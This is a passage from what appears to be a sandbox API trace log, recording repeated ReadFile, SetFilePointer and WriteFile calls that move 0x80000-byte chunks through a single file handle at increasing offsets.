nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.303] SetFilePointer (in: hFile=0x328, lDistanceToMove=4718592, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x480000 [0110.303] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.305] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.326] SetFilePointer (in: hFile=0x328, lDistanceToMove=5242880, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x500000 [0110.326] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.327] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.328] SetFilePointer (in: hFile=0x328, lDistanceToMove=5767168, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x580000 [0110.328] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.329] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.340] SetFilePointer (in: hFile=0x328, lDistanceToMove=6291456, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x600000 [0110.340] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.341] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.342] SetFilePointer (in: hFile=0x328, lDistanceToMove=6815744, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x680000 [0110.342] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.343] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.356] SetFilePointer (in: hFile=0x328, lDistanceToMove=7340032, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x700000 [0110.356] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.357] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.358] SetFilePointer (in: hFile=0x328, lDistanceToMove=7864320, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x780000 [0110.358] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.359] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.373] SetFilePointer (in: hFile=0x328, lDistanceToMove=8388608, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x800000 [0110.373] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.374] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.375] SetFilePointer (in: hFile=0x328, lDistanceToMove=8912896, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x880000 [0110.375] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.376] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.393] SetFilePointer (in: hFile=0x328, lDistanceToMove=9437184, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x900000 [0110.393] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.394] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.398] SetFilePointer (in: hFile=0x328, lDistanceToMove=9961472, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x980000 [0110.399] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.400] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.408] SetFilePointer (in: hFile=0x328, lDistanceToMove=10485760, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0xa00000 [0110.408] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.409] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.414] SetFilePointer (in: hFile=0x328, lDistanceToMove=11010048, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0xa80000 [0110.414] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.415] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.421] SetFilePointer (in: hFile=0x328, lDistanceToMove=11534336, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0xb00000 [0110.421] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.422] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.423] SetFilePointer (in: hFile=0x328, lDistanceToMove=12058624, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0xb80000 [0110.423] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.424] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.436] SetFilePointer (in: hFile=0x328, lDistanceToMove=12582912, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0xc00000 [0110.436] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.437] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.442] SetFilePointer (in: hFile=0x328, lDistanceToMove=13107200, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0xc80000 [0110.442] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.443] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.457] SetFilePointer (in: hFile=0x328, lDistanceToMove=13631488, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0xd00000 [0110.457] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.457] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.461] SetFilePointer (in: hFile=0x328, lDistanceToMove=14155776, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0xd80000 [0110.461] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.462] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.471] SetFilePointer (in: hFile=0x328, lDistanceToMove=14680064, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0xe00000 [0110.471] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.472] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.482] SetFilePointer (in: hFile=0x328, lDistanceToMove=15204352, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0xe80000 [0110.482] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.483] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.489] SetFilePointer (in: hFile=0x328, lDistanceToMove=15728640, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0xf00000 [0110.489] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.489] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.492] SetFilePointer (in: hFile=0x328, lDistanceToMove=16252928, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0xf80000 [0110.492] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.493] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.498] SetFilePointer (in: hFile=0x328, lDistanceToMove=16777216, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1000000 [0110.498] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.502] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.505] SetFilePointer (in: hFile=0x328, lDistanceToMove=17301504, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1080000 [0110.505] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.506] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.523] SetFilePointer (in: hFile=0x328, lDistanceToMove=17825792, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1100000 [0110.523] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.524] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.526] SetFilePointer (in: hFile=0x328, lDistanceToMove=18350080, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1180000 [0110.526] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.527] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.533] SetFilePointer (in: hFile=0x328, lDistanceToMove=18874368, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1200000 [0110.533] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.533] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.534] SetFilePointer (in: hFile=0x328, lDistanceToMove=19398656, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1280000 [0110.534] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.535] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.541] SetFilePointer (in: hFile=0x328, lDistanceToMove=19922944, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1300000 [0110.541] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.542] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.550] SetFilePointer (in: hFile=0x328, lDistanceToMove=20447232, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1380000 [0110.550] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.551] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.561] SetFilePointer (in: hFile=0x328, lDistanceToMove=20971520, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1400000 [0110.561] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.561] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.570] SetFilePointer (in: hFile=0x328, lDistanceToMove=21495808, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1480000 [0110.570] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.571] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.577] SetFilePointer (in: hFile=0x328, lDistanceToMove=22020096, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1500000 [0110.577] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.578] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.580] SetFilePointer (in: hFile=0x328, lDistanceToMove=22544384, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1580000 [0110.580] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.581] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.592] SetFilePointer (in: hFile=0x328, lDistanceToMove=23068672, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1600000 [0110.592] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.593] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.605] SetFilePointer (in: hFile=0x328, lDistanceToMove=23592960, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1680000 [0110.605] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.606] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.616] SetFilePointer (in: hFile=0x328, 